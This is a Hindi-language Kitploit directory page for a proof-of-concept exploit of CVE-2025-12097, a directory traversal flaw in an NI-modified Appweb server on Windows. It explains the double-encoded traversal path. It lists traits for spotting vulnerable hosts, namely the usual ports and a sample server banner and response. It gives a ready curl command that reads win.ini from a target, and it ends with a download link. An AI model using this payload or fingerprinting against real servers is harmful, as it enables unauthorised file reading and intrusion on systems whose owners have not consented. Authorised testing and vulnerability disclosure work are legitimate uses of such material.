Skip to content
KitploitKITPLOIT
उपकरणब्लॉग
जमा करें
उपकरणब्लॉग
जमा करें

हैकिंग, पेनटेस्ट और साइबर सुरक्षा उपकरण आपके सुरक्षा शस्त्रागार के लिए!

Kitploit हैकिंग, साइबर सुरक्षा और पेंटेस्टिंग टूल्स की एक निर्देशिका है। कमजोरियों को खोजने, सिस्टम का विश्लेषण करने, परीक्षण को स्वचालित करने और अपनी सुरक्षा को मजबूत करने के लिए नवीनतम प्रोजेक्ट अपडेट खोजें।

··फ़ीड·संपर्क·गोपनीयता·© 2026 Kitploit

टूल निर्देशिका

श्रेणियाँ

सभी श्रेणियाँ देखें
Loading categories
PoC-CVE-2025-12097 — CVE-2025-12097 के लिए प्रूफ-ऑफ-कॉन्सेप्ट एक्सप्लॉइट, जो NI-संशोधित Appweb सर्वर में एक डायरेक्टरी ट्रैवर्सल भेद्यता है, जो Windows सिस्टम पर मनमानी फ़ाइल पढ़ने की अनुमति देती है। | Kitploit
उपकरण/GitHubGitHub/matejsmycka/poc-cve-2025-12097
भेद्यता विश्लेषणशोषणवेब एप्लिकेशन शोषणजानकारी एकत्र करनापेनिट्रेशन टेस्टिंग
GitHubmatejsmycka/poc-cve-2025-12097

PoC-CVE-2025-12097

CVE-2025-12097 के लिए प्रूफ-ऑफ-कॉन्सेप्ट एक्सप्लॉइट, जो NI-संशोधित Appweb सर्वर में एक डायरेक्टरी ट्रैवर्सल भेद्यता है, जो Windows सिस्टम पर मनमानी फ़ाइल पढ़ने की अनुमति देती है।

रिपॉजिटरी देखें
19 महीने पहलेअभी तक समीक्षित नहीं

सबसे लोकप्रिय

सभी देखें →

हमारे समुदाय द्वारा सबसे अधिक उपयोग किए जाने वाले उपकरण खोजें।

सभी उपकरण खोजें

हमारे उपकरणों का संग्रह ब्राउज़ करें

सभी उपकरण देखें →
साझा करें

CVE-2025-12097

विवरण

Appweb सर्वर का NI संशोधन एक डायरेक्टरी ट्रैवर्सल भेद्यता (directory traversal vulnerability) रखता है जो एक हमलावर को सर्वर पर मनमानी फाइलें पढ़ने की अनुमति देता है।

URI पथ /.%252e/.%252e/.%252e/.%252e/.%252e/.%252e/windows/win.ini निम्न में परिवर्तित हो जाएगा:

pathInfo cchar * "/.%2e/.%2e/.%2e/.%2e/.%2e/.%2e/windows/win.ini” 0x000000010076f808 जो एक वैध URI है और appweb इस अनुरोध को ब्लॉक नहीं करता है। इसे फिर कस्टम हैंडलर को पारित किया जाता है जो इस मामले में किसी भी अनुरोधित फाइल की सामग्री लौटाता है।

प्रभावित सॉफ्टवेयर की प्रकृति के कारण, प्रभावित डिवाइस केवल Microsoft Windows सिस्टम हैं।

देखा गया सबसे अधिक भेद्य संस्करण: 12.0.0.

भेद्य डिवाइसों की पहचान

प्रभावित डिवाइसों की पहचान निम्नलिखित विशेषताओं द्वारा की जा सकती है:

हमेशा मौजूद नहीं होता, लेकिन अधिकांश मामलों में सेवा पोर्ट 3580 पर चलती है, अन्य पोर्ट में 8080 और 80 शामिल हो सकते हैं।

/ के लिए सर्वर प्रतिक्रिया

root@kitploit:~
HTTP/1.1 404 Not Found
Server: Mbedthis-Appweb/2.5.0
Date: Thu, 11 Dec 2025 18:23:26 GMT
Connection: keep-alive
Keep-Alive: timeout=60000, max=100
Content-Type: text/html
Content-length: 126

<HTML><HEAD><TITLE>Document Error: Not Found</TITLE></HEAD>
<BODY><H2>Access Error: 404 -- Not Found</H2>
</BODY></HTML>

PoC

इस भेद्यता का शोषण करने के लिए, आप निम्नलिखित कमांड का उपयोग कर सकते हैं:

root@kitploit:~
curl http://<TARGET>:3580/.%252e/.%252e/.%252e/.%252e/.%252e/.%252e/windows/win.ini

यदि लक्ष्य भेद्य है तो आपको win.ini फाइल की सामग्री दिखाई देगी।

टूल डाउनलोड करें